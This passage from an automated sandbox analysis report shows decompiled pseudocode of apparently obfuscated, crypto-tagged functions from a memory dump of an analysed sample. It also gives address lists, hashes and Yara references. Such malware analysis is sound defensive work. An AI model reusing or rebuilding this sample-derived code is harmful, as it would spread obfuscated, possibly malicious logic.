					_pop(_t47);
					 *0x6e061a9 = 0xbedcb08c;
					asm("adc ebp, [0x52d49b1d]");
					asm("sbb eax, 0x12a494ff");
					_t46 = _t47 + 1;
					if(_t46 >= 0) {
						_t54 = _t54 ^  *0xdbbbf70;
						asm("adc edx, 0x1952642d");
						 *0x76c50992 =  *0x76c50992 & _t77;
						 *0x919f2be0 =  *0x919f2be0 | _t54;
						if(( *0xedfcdea9 & _t77) < 0) {
							asm("sbb ebx, 0x53bd4679");
							_t43 = _t43 -  *0xe4a51cc0;
							_push(0x2f0942b);
							if(_t43 > 0) {
								_t86 = _t86 - 0x46d276ce;
								_t58 = _t54 |  *0x813dd98b;
								_t66 = _t66 - 0x8c15642f;
								asm("sbb esp, [0xe01de28f]");
								_t7 = _t77;
								_t77 =  *0x2639eabb;
								 *0x2639eabb = _t7;
								 *0xefa5bc84 =  *0xefa5bc84 + _t58;
								asm("ror dword [0x7b28cfc4], 0x54");
								_t83 = _t83 + 1;
								L1();
								asm("adc ecx, [0x2ada94e8]");
								 *0x6c393ca1 =  *0x6c393ca1 << 0x40;
								asm("sbb bh, 0x80");
								_push( *0xb683323b);
								_t73 =  *0xd903bc7e * 0x0000334b |  *0x1ecd1601;
								_t46 = _t46 + 0xb1;
								_t54 = _t58 - 1 + 1;
								asm("rol dword [0xd2c8be91], 0x68");
								if(_t58 - 1 + 1 < 0) {
									_t46 = _t46 ^ 0x000000e3;
									_t77 =  *0x55cddf6b * 0x3572;
									_t54 =  *0x381c8a2c;
									_t10 = _t43;
									_t43 =  *0x2fb03f39;
									 *0x2fb03f39 = _t10;
									asm("cmpsb");
									_t86 = _t86 + 1;
									 *0x2f9dcb98 = _t46;
									_t66 = _t66 |  *0x9ba87299;
									 *0x70375589 =  *0x70375589 + _t77;
									_t74 = _t73 + 0xd11d7961;
									asm("adc [0x7d6689fc], ebp");
									 *0x5e5fddb1 =  *0x5e5fddb1 & _t43;
									_push( *0x22c253c0);
									if( *0x5e5fddb1 >= 0) {
										asm("sbb [0xbcec1c78], esp");
										_pop(_t49);
										 *0x1b12efe2 =  *0x1b12efe2 & _t66;
										_t77 = _t77 | 0x8d0ed5c2;
										_t66 = 0x3c;
										asm("sbb bh, 0xb6");
										_t83 = _t83 +  *0xbfa8c9b9;
										_t46 = _t49 |  *0x93528deb;
										asm("ror dword [0x15fd090f], 0x9b");
										_push(_t74);
										asm("adc dl, [0x16500fa8]");
										asm("cmpsw");
										 *0xcf540b66 =  *0xcf540b66 & _t54;
										_t54 =  *0x11f0afa3;
										asm("cmpsw");
										 *0x13d5e90b =  *0x13d5e90b >> 0x3f;
										_t86 =  *0xa4674d65;
										asm("scasb");
										asm("sbb bl, [0x59c45e1]");
										_t75 = _t74 + 1;
										if(_t75 == 0) {
											 *0xdde5027b =  *0xdde5027b - _t86;
											 *0xb37e1e3b =  *0xb37e1e3b << 0x2c;
											_t83 = _t83 - 0x96aa2501;
											 *0x3eae01c4 =  *0x3eae01c4 & _t54;
											 *0x81240e12 =  *0x81240e12 ^ 0x0000003c;
											_t43 = _t43 -  *0xf4fa55e6;
											asm("ror dword [0x32be08a1], 0xad");
											asm("rcr byte [0xf98450d0], 0xef");
											 *0x12e076c2 = 0x96afe4d3;
											asm("adc [0x1190d6c1], ecx");
											asm("rcl dword [0x77c92321], 0x3a");
											_t66 =  *0xddea0e3e - 0x1d9e641b ^  *0x94517f9d;
											_t60 = _t54 & 0x48820617;
											_t86 = _t86 | 0x1056278e;
											_t46 = (_t46 ^  *0x56f70de0) + 1;
											asm("movsw");
											_push(0x887e48d);
											_push(_t60);
											 *0x43924ed4 = _t60;
											asm("rcr dword [0x11f9e507], 0x58");
											_t54 = ( *0x43924ed4 |  *0xa103c411) +  *0x270a6909;
											if(_t54 == 0) {
												_t26 = _t66;
												_t66 =  *0xc30a66a2;
												 *0xc30a66a2 = _t26;
												 *0x963752f5 =  *0x963752f5 & _t66;
												 *0xe1db3f =  *0xe1db3f - _t75;
												_t43 = _t43 ^ 0x000000e3;
												 *0x3bfd3517 =  *0x3bfd3517 >> 0xef;
												_t77 = _t77 &  *0x40458d3d;
												asm("sbb ebp, [0x9285ddd6]");
												if(_t77 != 0) {
													asm("lodsd");
													_push(_t86);
													 *0xa2ad5fe2 =  *0xa2ad5fe2 >> 0xbb;
													asm("adc ecx, [0x5c351b2b]");
													_t27 = _t86;
													_t86 =  *0xe4df1df;
													 *0xe4df1df = _t27;
													asm("rcl dword [0x9989c61], 0xe");
													_t52 = _t46 - 1 + 0x2a;
													 *0x5ac2f796 =  *0x5ac2f796 << 0xc4;
													 *0xbf120f3f =  *0xbf120f3f - _t54;
													 *0x6a17ab6f =  *0x6a17ab6f ^ _t43;
													asm("sbb [0xfabb0309], esp");
													 *0x4f6ba01b =  *0x4f6ba01b & _t66;
													 *0x928f09e2 =  *0x928f09e2 | _t43;
													 *0x7cd2d53c =  *0x7cd2d53c << 0xec;
													 *0xeebe58bf =  *0xeebe58bf ^ _t66;
													asm("adc esp, [0xf376bb2d]");
													 *0x656ac2ef =  *0x656ac2ef ^ _t52;
													asm("ror dword [0x7d594e98], 0xf7");
													asm("rcl dword [0xf6af0494], 0x67");
													_push(_t66);
													asm("ror dword [0x517b2e93], 0x6d");
													_t46 = _t52 ^  *0xcdd67b92;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				goto L1;
			}

0x0121bce2
0x0121bce8
0x0121bcee
0x0121bcf4
0x0121bcfa
0x0121bd00
0x0121bd06
0x0121bd0d
0x0121bd14
0x0121bd1a
0x0121bd21
0x0121bd28
0x0121bd29
0x0121bd35
0x0121bd3b
0x0121bd42
0x0121bd4e
0x0121bd55
0x0121bd5b
0x0121bd5c
0x0121bd66
0x0121bd6c
0x0121bd72
0x0121bd79
0x0121bd7f
0x0121bd8f
0x0121bd9b
0x0121bda1
0x0121bda7
0x0121bdad
0x0121bdb9
0x0121bdc0
0x0121bdc7
0x0121bdcd
0x0121bdce
0x0121bdd3
0x0121bddd
0x0121bdde
0x0121bde4
0x0121bdea
0x0121bdf0
0x0121bdf1
0x0121bdf7
0x0121bdfd
0x0121be03
0x0121be09
0x0121be13
0x0121be1a
0x0121be20
0x0121be26
0x0121be2c
0x0121be2d
0x0121be2d
0x0121be2d
0x0121be33
0x0121be39
0x0121be46
0x0121be4c
0x0121be52
0x0121be58
0x0121be5e
0x0121be64
0x0121be6b
0x0121be71
0x0121be78
0x0121be7f
0x0121be86
0x0121be8c
0x0121be96
0x0121bea8
0x0121bead
0x0121beae
0x0121beb4
0x0121beba
0x0121bec0
0x0121bec6
0x0121bed0
0x0121bed3
0x0121beda
0x0121bee4
0x0121beeb
0x0121bef7
0x0121beff
0x0121beff
0x0121beff
0x0121bf05
0x0121bf0b
0x0121bf0b
0x0121be86
0x0121be03
0x0121b8c6
0x0121b8c6
0x0121b8cd
0x0121b8d3
0x0121b8e5
0x0121b8f7
0x0121b8fd
0x0121b902
0x0121b904
0x0121b90b
0x0121b912
0x0121b925
0x0121b92c
0x0121b932
0x0121b93e
0x0121b944
0x0121b94a
0x0121b951
0x0121b957
0x0121b967
0x0121b973
0x0121b976
0x0121b97c
0x0121b983
0x0121b989
0x0121b98c
0x0121b998
0x0121b9a5
0x0121b9ab
0x0121b9b1
0x0121b9b7
0x0121b9b9
0x0121b9bf
0x0121b9c5
0x0121b9ca
0x0121b9cb
0x0121b9d1
0x0121b9d7
0x0121b9e3
0x0121b9e9
0x0121b9f5
0x0121b9fb
0x0121ba01
0x0121ba07
0x0121ba0c
0x0121ba1c
0x0121ba22
0x0121ba28
0x0121ba2e
0x0121ba34
0x0121ba34
0x0121ba34
0x0121ba3b
0x0121ba4d
0x0121ba54
0x0121ba55
0x0121ba5a
0x0121ba60
0x0121ba68
0x0121ba6b
0x0121ba71
0x0121ba77
0x0121ba7a
0x0121ba7b
0x0121ba82
0x0121ba8e
0x0121ba91
0x0121ba9b
0x0121baa1
0x0121baa1
0x0121baa1
0x0121baa7
0x0121baa8
0x0121baa9
0x0121baaf
0x0121bab5
0x0121babb
0x0121bac7
0x0121bacd
0x0121bad3
0x0121bad9
0x0121badf
0x0121bae5
0x0121bae6
0x0121bafe
0x0121bb04
0x0121bb06
0x0121bb09
0x0121bb0f
0x0121bb15
0x0121bb1c
0x0121bb1d
0x0121bb23
0x0121bb25
0x0121bb31
0x0121bb37
0x0121bb39
0x0121bb40
0x0121bb46
0x0121bb4d
0x0121bb53
0x0121bb54
0x0121bb5a
0x0121bb6b
0x0121bb72
0x0121bb78
0x0121bb7e
0x0121bb84
0x0121bb8a
0x0121bb91
0x0121bb98
0x0121bba4
0x0121bbb2
0x0121bbbf
0x0121bbc5
0x0121bbcb
0x0121bbd4
0x0121bbd5
0x0121bbd7
0x0121bbdc
0x0121bbdd
0x0121bbe9
0x0121bbf6
0x0121bbfc
0x0121bc08
0x0121bc08
0x0121bc08
0x0121bc0e
0x0121bc14
0x0121bc1a
0x0121bc1c
0x0121bc23
0x0121bc29
0x0121bc2f
0x0121bc3c
0x0121bc3d
0x0121bc3e
0x0121bc45
0x0121bc51
0x0121bc51
0x0121bc51
0x0121bc57
0x0121bc5f
0x0121bc62
0x0121bc72
0x0121bc78
0x0121bc7e
0x0121bc8a
0x0121bc96
0x0121bc9c
0x0121bca3
0x0121bca9
0x0121bcaf
0x0121bcb5
0x0121bcbc
0x0121bcc3
0x0121bcc4
0x0121bcd1
0x0121bcd1
0x0121bc2f
0x0121bbfc
0x0121bb54
0x0121bad9
0x0121ba82
0x0121ba0c
0x0121b9f5
0x0121b9cb
0x00000000

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 680e6a20f91752b5603c43fe85afb0cea5432aca2d9cc438613d3574b360e1a2
Instruction ID: c7b8400158424dcfdbe51a6f1afacfbc734e6290175cdca5cb3b1b05c9a6354a
Opcode Fuzzy Hash: 680e6a20f91752b5603c43fe85afb0cea5432aca2d9cc438613d3574b360e1a2
Instruction Fuzzy Hash: E6E1E87295A784CFD71ACF38D89AB413FB5FB42720708025ED8A2971D6D7302226CF89

Uniqueness

Uniqueness Score: -1.00%

Function 0121BF11, Relevance: .2, Instructions: 243
COMMONCrypto

Download Yara Rule

C-Code - Quality: 63%

			E0121BF11(signed char __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int __esi) {
				signed char _t29;
				signed int _t32;
				void* _t33;
				signed int _t35;
				signed int _t38;
				signed char _t42;
				signed int _t43;
				signed int _t45;
				signed int _t50;
				signed int _t56;
				void* _t57;
				void* _t58;
				signed int _t60;
				signed int _t65;
				signed int _t66;

				_t60 = __esi;
				_t50 = __edx;
				_t39 = __ecx;
				_t32 = __ebx;
				_t29 = __eax;
				 *0xc31b76c4 =  *0xc31b76c4 >> 0x15;
				_t65 =  *0xd414d36a * 0x15d7;
				 *0x980a7514 =  *0x980a7514 & __ebx;
				if( *0x980a7514 == 0) {
					__ebx =  *0x9951777b;
					__esp = __esp & 0x01c4b717;
					asm("sbb ecx, [0x87efee8b]");
					if(__esp < 0) {
						goto L1;
					}
					 *0xb4971278 =  *0xb4971278 | __edx;
					asm("rcl dword [0xec9d43cf], 0xbe");
					asm("rcr dword [0xcb8d5d61], 0x59");
					__ecx = __ecx & 0xe74c6bce;
					__ebx = __ebx |  *0xe060fb8b;
					 *0x9a37a60b =  *0x9a37a60b >> 0x70;
					__ebx =  *0xa7e1a26a * 0x4906;
					__esp = __esp ^  *0x22ae0bef;
					 *0xadc8a402 =  *0xadc8a402 - __bl;
					__ebx =  *0xa7e1a26a * 0x00004906 ^ 0x46417e29;
					asm("ror byte [0x550715d7], 0xef");
					__esp = __esp + 0x2cfa973b;
					__eax = __eax + 1;
					__esi = __esi ^  *0x3cfa9f09;
					 *0x8ec88f05 =  *0x8ec88f05 >> 0xf4;
					__esp = __esp +  *0xe30c330f;
					__edx = __edx ^ 0x3cf98811;
					__esi = __esi ^ 0x91ac30f1;
					__dl = __dl - 0x28;
					__esi = __esi + 1;
					asm("sbb [0x8656ca9f], ebx");
					 *0x1cd32786 =  *0x1cd32786 & __ah;
					_push(__esp);
					if( *0x1cd32786 <= 0) {
						goto L1;
					}
					__esi =  *0x510b677e * 0x1f90;
					return __eax;
				}
				L1:
				_t65 = _t65 ^  *0x9163d009;
				asm("adc ecx, [0xcb376964]");
				asm("rol dword [0xf5d30d66], 0x56");
				_t50 = _t50 ^ 0x0c5600c5;
				_t66 = _t66 + 0x00000001 &  *0x150c2365;
				 *0x5024cc08 = _t29;
				if(_t66 > 0) {
					 *0x6fe0ff76 =  *0x6fe0ff76 << 0xd3;
					asm("rcr dword [0xbd9d05ba], 0x13");
					 *0xdc2f2c5 =  *0xdc2f2c5 << 0xdf;
					 *0x12644fe5 =  *0x12644fe5 ^ _t32;
					 *0xbf7d8c13 =  *0xbf7d8c13 | _t65;
					asm("sbb edi, [0x10b0771d]");
					asm("sbb esp, [0x9fc9fd8]");
					_t65 =  *0xf277a2f7;
					asm("ror byte [0x5838e010], 0x8");
					 *0xc879156f = _t60;
					_pop(_t42);
					_t39 = _t42 &  *0xdb161904;
					_t50 = _t50 ^ 0x0000000a;
					 *0x4f4209e3 =  *0x4f4209e3 | _t39;
					_t66 = _t66 - 1;
					 *0x51056664 =  *0x51056664 | _t39;
					asm("sbb cl, 0xca");
					_t29 = (_t29 | 0x0000000a) +  *0xda085b12 |  *0xac2d4fd;
					 *0xe1755d15 =  *0xe1755d15 << 0x62;
					 *0x680cba93 =  *0x680cba93 - _t50;
					_t60 = _t60 +  *0x5fe0d3d6 - 0x2c51de2b &  *0x40e196fb |  *0xdae16ea9;
					 *0x2c370fe3 =  *0x2c370fe3 + _t50;
					_pop(_t33);
					 *0x6e061a9 = 0xbedcb08c;
					asm("adc ebp, [0x52d49b1d]");
					asm("sbb eax, 0x12a494ff");
					_t32 = _t33 + 1;
					if(_t32 >= 0) {
						_t39 = _t39 ^  *0xdbbbf70;
						asm("adc edx, 0x1952642d");
						 *0x76c50992 =  *0x76c50992 & _t60;
						 *0x919f2be0 =  *0x919f2be0 | _t39;
						if(( *0xedfcdea9 & _t60) < 0) {
							asm("sbb ebx, 0x53bd4679");
							_t29 = _t29 -  *0xe4a51cc0;
							_push(0x2f0942b);
							if(_t29 > 0) {
								_t66 = _t66 - 0x46d276ce;
								_t43 = _t39 |  *0x813dd98b;
								_t50 = _t50 - 0x8c15642f;
								asm("sbb esp, [0xe01de28f]");
								_t5 = _t60;
								_t60 =  *0x2639eabb;
								 *0x2639eabb = _t5;
								 *0xefa5bc84 =  *0xefa5bc84 + _t43;
								asm("ror dword [0x7b28cfc4], 0x54");
								_t65 = _t65 + 1;
								L1();
								asm("adc ecx, [0x2ada94e8]");
								 *0x6c393ca1 =  *0x6c393ca1 << 0x40;
								asm("sbb bh, 0x80");
								_push( *0xb683323b);
								_t56 =  *0xd903bc7e * 0x0000334b |  *0x1ecd1601;
								_t32 = _t32 + 0xb1;
								_t39 = _t43 - 1 + 1;
								asm("rol dword [0xd2c8be91], 0x68");
								if(_t43 - 1 + 1 < 0) {
									_t32 = _t32 ^ 0x000000e3;
									_t60 =  *0x55cddf6b * 0x3572;
									_t39 =  *0x381c8a2c;
									_t8 = _t29;
									_t29 =  *0x2fb03f39;
									 *0x2fb03f39 = _t8;
									asm("cmpsb");
									_t66 = _t66 + 1;
									 *0x2f9dcb98 = _t32;
									_t50 = _t50 |  *0x9ba87299;
									 *0x70375589 =  *0x70375589 + _t60;
									_t57 = _t56 + 0xd11d7961;
									asm("adc [0x7d6689fc], ebp");
									 *0x5e5fddb1 =  *0x5e5fddb1 & _t29;
									_push( *0x22c253c0);
									if( *0x5e5fddb1 >= 0) {
										asm("sbb [0xbcec1c78], esp");
										_pop(_t35);
										 *0x1b12efe2 =  *0x1b12efe2 & _t50;
										_t60 = _t60 | 0x8d0ed5c2;
										_t50 = 0x3c;
										asm("sbb bh, 0xb6");
										_t65 = _t65 +  *0xbfa8c9b9;
										_t32 = _t35 |  *0x93528deb;
										asm("ror dword [0x15fd090f], 0x9b");
										_push(_t57);
										asm("adc dl, [0x16500fa8]");
										asm("cmpsw");
										 *0xcf540b66 =  *0xcf540b66 & _t39;
										_t39 =  *0x11f0afa3;
										asm("cmpsw");
										 *0x13d5e90b =  *0x13d5e90b >> 0x3f;
										_t66 =  *0xa4674d65;
										asm("scasb");
										asm("sbb bl, [0x59c45e1]");
										_t58 = _t57 + 1;
										if(_t58 == 0) {
											 *0xdde5027b =  *0xdde5027b - _t66;
											 *0xb37e1e3b =  *0xb37e1e3b << 0x2c;
											_t65 = _t65 - 0x96aa2501;
											 *0x3eae01c4 =  *0x3eae01c4 & _t39;
											 *0x81240e12 =  *0x81240e12 ^ 0x0000003c;
											_t29 = _t29 -  *0xf4fa55e6;
											asm("ror dword [0x32be08a1], 0xad");
											asm("rcr byte [0xf98450d0], 0xef");
											 *0x12e076c2 = 0x96afe4d3;
											asm("adc [0x1190d6c1], ecx");
											asm("rcl dword [0x77c92321], 0x3a");
											_t50 =  *0xddea0e3e - 0x1d9e641b ^  *0x94517f9d;
											_t45 = _t39 & 0x48820617;
											_t66 = _t66 | 0x1056278e;
											_t32 = (_t32 ^  *0x56f70de0) + 1;
											asm("movsw");
											_push(0x887e48d);
											_push(_t45);
											 *0x43924ed4 = _t45;
											asm("rcr dword [0x11f9e507], 0x58");
											_t39 = ( *0x43924ed4 |  *0xa103c411) +  *0x270a6909;
											if(_t39 == 0) {
												_t24 = _t50;
												_t50 =  *0xc30a66a2;
												 *0xc30a66a2 = _t24;
												 *0x963752f5 =  *0x963752f5 & _t50;
												 *0xe1db3f =  *0xe1db3f - _t58;
												_t29 = _t29 ^ 0x000000e3;
												 *0x3bfd3517 =  *0x3bfd3517 >> 0xef;
												_t60 = _t60 &  *0x40458d3d;
												asm("sbb ebp, [0x9285ddd6]");
												if(_t60 != 0) {
													asm("lodsd");
													_push(_t66);
													 *0xa2ad5fe2 =  *0xa2ad5fe2 >> 0xbb;
													asm("adc ecx, [0x5c351b2b]");
													_t25 = _t66;
													_t66 =  *0xe4df1df;
													 *0xe4df1df = _t25;
													asm("rcl dword [0x9989c61], 0xe");
													_t38 = _t32 - 1 + 0x2a;
													 *0x5ac2f796 =  *0x5ac2f796 << 0xc4;
													 *0xbf120f3f =  *0xbf120f3f - _t39;
													 *0x6a17ab6f =  *0x6a17ab6f ^ _t29;
													asm("sbb [0xfabb0309], esp");
													 *0x4f6ba01b =  *0x4f6ba01b & _t50;
													 *0x928f09e2 =  *0x928f09e2 | _t29;
													 *0x7cd2d53c =  *0x7cd2d53c << 0xec;
													 *0xeebe58bf =  *0xeebe58bf ^ _t50;
													asm("adc esp, [0xf376bb2d]");
													 *0x656ac2ef =  *0x656ac2ef ^ _t38;
													asm("ror dword [0x7d594e98], 0xf7");
													asm("rcl dword [0xf6af0494], 0x67");
													_push(_t50);
													asm("ror dword [0x517b2e93], 0x6d");
													_t32 = _t38 ^  *0xcdd67b92;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				goto L1;
			}

0x0121bf11
0x0121bf11
0x0121bf11
0x0121bf11
0x0121bf11
0x0121bf1d
0x0121bf24
0x0121bf2e
0x0121bf34
0x0121bf3a
0x0121bf40
0x0121bf46
0x0121bf4c
0x00000000
0x00000000
0x0121bf52
0x0121bf58
0x0121bf5f
0x0121bf66
0x0121bf6c
0x0121bf72
0x0121bf7f
0x0121bf89
0x0121bf95
0x0121bf9b
0x0121bfa1
0x0121bfa8
0x0121bfb4
0x0121bfb5
0x0121bfbb
0x0121bfc8
0x0121bfd4
0x0121bfdc
0x0121bfe2
0x0121bfe5
0x0121bfe6
0x0121bfec
0x0121bff2
0x0121bff3
0x00000000
0x00000000
0x0121bff9
0x0121c003
0x0121c003
0x0121b8c6
0x0121b8c6
0x0121b8cd
0x0121b8d3
0x0121b8e5
0x0121b8f7
0x0121b8fd
0x0121b902
0x0121b904
0x0121b90b
0x0121b912
0x0121b925
0x0121b92c
0x0121b932
0x0121b93e
0x0121b944
0x0121b94a
0x0121b951
0x0121b957
0x0121b967
0x0121b973
0x0121b976
0x0121b97c
0x0121b983
0x0121b989
0x0121b98c
0x0121b998
0x0121b9a5
0x0121b9ab
0x0121b9b1
0x0121b9b7
0x0121b9b9
0x0121b9bf
0x0121b9c5
0x0121b9ca
0x0121b9cb
0x0121b9d1
0x0121b9d7
0x0121b9e3
0x0121b9e9
0x0121b9f5
0x0121b9fb
0x0121ba01
0x0121ba07
0x0121ba0c
0x0121ba1c
0x0121ba22
0x0121ba28
0x0121ba2e
0x0121ba34
0x0121ba34
0x0121ba34
0x0121ba3b
0x0121ba4d
0x0121ba54
0x0121ba55
0x0121ba5a
0x0121ba60
0x0121ba68
0x0121ba6b
0x0121ba71
0x0121ba77
0x0121ba7a
0x0121ba7b
0x0121ba82
0x0121ba8e
0x0121ba91
0x0121ba9b
0x0121baa1
0x0121baa1
0x0121baa1
0x0121baa7
0x0121baa8
0x0121baa9
0x0121baaf
0x0121bab5
0x0121babb
0x0121bac7
0x0121bacd
0x0121bad3
0x0121bad9
0x0121badf
0x0121bae5
0x0121bae6
0x0121bafe
0x0121bb04
0x0121bb06
0x0121bb09
0x0121bb0f
0x0121bb15
0x0121bb1c
0x0121bb1d
0x0121bb23
0x0121bb25
0x0121bb31
0x0121bb37
0x0121bb39
0x0121bb40
0x0121bb46
0x0121bb4d
0x0121bb53
0x0121bb54
0x0121bb5a
0x0121bb6b
0x0121bb72
0x0121bb78
0x0121bb7e
0x0121bb84
0x0121bb8a
0x0121bb91
0x0121bb98
0x0121bba4
0x0121bbb2
0x0121bbbf
0x0121bbc5
0x0121bbcb
0x0121bbd4
0x0121bbd5
0x0121bbd7
0x0121bbdc
0x0121bbdd
0x0121bbe9
0x0121bbf6
0x0121bbfc
0x0121bc08
0x0121bc08
0x0121bc08
0x0121bc0e
0x0121bc14
0x0121bc1a
0x0121bc1c
0x0121bc23
0x0121bc29
0x0121bc2f
0x0121bc3c
0x0121bc3d
0x0121bc3e
0x0121bc45
0x0121bc51
0x0121bc51
0x0121bc51
0x0121bc57
0x0121bc5f
0x0121bc62
0x0121bc72
0x0121bc78
0x0121bc7e
0x0121bc8a
0x0121bc96
0x0121bc9c
0x0121bca3
0x0121bca9
0x0121bcaf
0x0121bcb5
0x0121bcbc
0x0121bcc3
0x0121bcc4
0x0121bcd1
0x0121bcd1
0x0121bc2f
0x0121bbfc
0x0121bb54
0x0121bad9
0x0121ba82
0x0121ba0c
0x0121b9f5
0x0121b9cb
0x00000000

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20f7c28b303b1cbb968f6d678b91225acc34f91c498389915b5a3c40ffeaac0f
Instruction ID: 91c3a2547a8cb7e6421279bb4868ac747606260a988782833da0e38777cc3b6a
Opcode Fuzzy Hash: 20f7c28b303b1cbb968f6d678b91225acc34f91c498389915b5a3c40ffeaac0f
Instruction Fuzzy Hash: A3C1A472929749CFD716DF38C99B7863FB1FB12720709025ED9A293186D7302626CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0121CF7D, Relevance: .2, Instructions: 228
COMMONCrypto

Download Yara Rule

C-Code - Quality: 63%

			E0121CF7D(signed int __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				signed int _t29;

				_t29 = __eax ^ 0xd7249a37;
				 *0xe8b50d82 = _t29;
				if(_t29 != 0) {
					L1:
					return _t29;
				} else {
					__esi = __esi +  *0x143c827b;
					__bl = __bl ^ 0x00000063;
					__eax = __eax + 1;
					__eax = __eax -  *0x1c92be67;
					_push( *0x855a6ac5);
					__esp =  *0xb92d936a * 0xf9d7;
					 *0x83b4df36 =  *0x83b4df36 | __esi;
					__cl = __cl - 0x86;
					 *0x8433dd2d =  *0x8433dd2d >> 0xd2;
					__eax = __eax + 0x6e9cebfb;
					asm("sbb [0xe2251599], ebp");
					if(__eax > 0) {
						goto L1;
					} else {
						__esp =  *0xf727de7f * 0xfa83;
						__esi = __esi - 1;
						__esi = __esi ^ 0xd4fabfda;
						__al = __al &  *0x22b634f9;
						__ebx = __ebx + 1;
						 *0xf845c48e = __eax;
						__eax = __eax +  *0x8cec916c;
						asm("adc [0x70cc53c9], ah");
						__ecx = 0x260924fe;
						asm("sbb ebp, 0xbe94e996");
						__ah = __ah |  *0x1d06d604;
						asm("sbb dl, [0x16f0b2d7]");
						asm("rcr byte [0x76451f82], 0x6f");
						__ebx = __ebx ^ 0x8a04283e;
						 *0x25675334 =  *0x25675334 + __bl;
						asm("sbb [0x87eb43dd], ebx");
						 *0xe59a7f99 =  *0xe59a7f99 ^ __ebx;
						__esi = __esi |  *0x9db681ff;
						__ebp = __ebp -  *0x4d326b13;
						asm("sbb [0x71ce4196], ebx");
						__eax = __eax ^  *0xdc310915;
						__ch = __ch |  *0x5350c638;
						if(__ch < 0) {
							goto L1;
						} else {
							__esp =  *0xabdae07c * 0x6d73;
							 *0xb2bda80d =  *0xb2bda80d >> 0x96;
							asm("scasd");
							 *0xbc58b093 =  *0xbc58b093 << 0x39;
							if( *0xbc58b093 < 0) {
								goto L1;
							} else {
								__ebx = __ebx +  *0x915bfa70;
								__esi = __esi ^  *0xc2407591;
								__ebp = __ebp & 0x81b6069e;
								asm("sbb esp, 0x1a8bb105");
								 *0xe0ff03f7 =  *0xe0ff03f7 >> 0x80;
								__ebp = __ebp + 0x1428521f;
								 *0x142da3be =  *0x142da3be + __esi;
								_push( *0x89bcf298);
								 *0x8ae46a3d =  *0x8ae46a3d >> 0x41;
								if( *0x8ae46a3d <= 0) {
									goto L1;
								} else {
									__esi = __esi - 1;
									__eax = __eax - 1;
									 *0x185fa682 =  *0x185fa682 & __bl;
									 *0x87881217 =  *0x87881217 << 0xd5;
									__eax =  *0x759eed01;
									 *0xcc586f35 = 0x260924fe;
									__eax =  *0x759eed01 +  *0xeb4489f7;
									__esi = 0x6c079591;
									 *0x23f427f2 =  *0x23f427f2 | __ah;
									asm("scasb");
									_t9 = __ebx;
									__ebx =  *0x210cd407;
									 *0x210cd407 = _t9;
									_push( *0x8e10baee);
									if( *0x23f427f2 != 0) {
										goto L1;
									} else {
										__esp = __esp -  *0xc73cc27a;
										asm("rol dword [0xf935c101], 0x4e");
										asm("rcl byte [0x71939000], 0x2e");
										asm("movsw");
										 *0x10064e9c = __edx;
										__esi = 0x3a8b1f96;
										asm("ror byte [0x79e2d4c9], 0x24");
										__ebx = __ebx &  *0x392c507;
										__cl = 0xe4;
										asm("scasb");
										__ah = __ah + 0xb7;
										asm("adc [0xcb4eecdd], esi");
										asm("scasd");
										if(__ah <= 0) {
											goto L1;
										} else {
											__edx =  *0xc7c30e7e * 0xa621;
											asm("ror dword [0x63f11c2b], 0xf2");
											__esp = __esp | 0xff01b9cd;
											__ecx =  *0xf0eb4a69 * 0x9c52;
											asm("adc [0x3afed09], ecx");
											 *0x8b79a01a =  *0x8b79a01a << 0x4a;
											__ebx = __ebx -  *0xd7d9181b;
											_t12 = __esp;
											__esp =  *0x6a02e6d4;
											 *0x6a02e6d4 = _t12;
											__esp =  *0x6a02e6d4 -  *0x4390709;
											__edi = __edi -  *0x96badea3;
											__ecx =  *0xf0eb4a69 * 0x9c52 - 1;
											__ecx =  *0xf0eb4a69 * 0x00009c52 - 0x00000001 ^  *0x1f17017;
											asm("sbb [0x55dbaec9], dh");
											 *0xbe57cbec =  *0xbe57cbec + __ebx;
											if( *0xbe57cbec != 0) {
												goto L1;
											} else {
												asm("sbb [0x6ab5b97b], esp");
												asm("sbb edi, [0x2fcaa5f8]");
												asm("rcl byte [0x9f88514], 0xc6");
												asm("adc bl, [0xc9f03a]");
												asm("stosb");
												__cl = 0x24;
												__ecx = __ecx - 1;
												asm("scasb");
												__edx = __edx - 1;
												__esi = 0x3a8b1f96 ^  *0x4131e18e;
												 *0x4b5ec382 =  *0x4b5ec382 | __bl;
												 *0xb5bf3ad5 =  *0xb5bf3ad5 << 0x64;
												_pop(__esp);
												asm("ror dword [0x3f1c0e66], 0x7a");
												__cl = 0xb5;
												 *0x3a1eb737 =  *0x3a1eb737 | __eax;
												asm("adc edi, [0xf0f03f96]");
												_pop(__edx);
												__esp = __esp & 0x48bda9c1;
												__edi = __edi |  *0x6e3f07ec;
												 *0x7aee9624 =  *0x7aee9624 & __dh;
												asm("sbb [0xfd14c883], ecx");
												0xdb55e626 = 0xffffffffdb55e625;
												asm("rcl dword [0x990a1098], 0xef");
												 *0xda9afb99 =  *0xda9afb99 ^ __ebx;
												__esi = (0x3a8b1f96 ^  *0x4131e18e) &  *0x6dabf7ed;
												 *0xd8118a1e =  *0xd8118a1e << 0xae;
												asm("rcl dword [0xdc2a41fb], 0x1b");
												asm("adc edi, [0x9f4ec0cc]");
												__eax = __eax + 1;
												__ebx = __ebx +  *0x8c45a20b;
												__bl = __bl -  *0x13cbb7d7;
												L1();
												__edi =  *0xfee330e8;
												asm("ror dword [0xd5799c9c], 0xb4");
												 *0xc49e2882 =  *0xc49e2882 & __bl;
												__ebx = __ebx -  *0x2ba4be65;
												 *0xfc3ed2bf =  *0xfc3ed2bf >> 0x73;
												__edi =  *0xfee330e8 - 1;
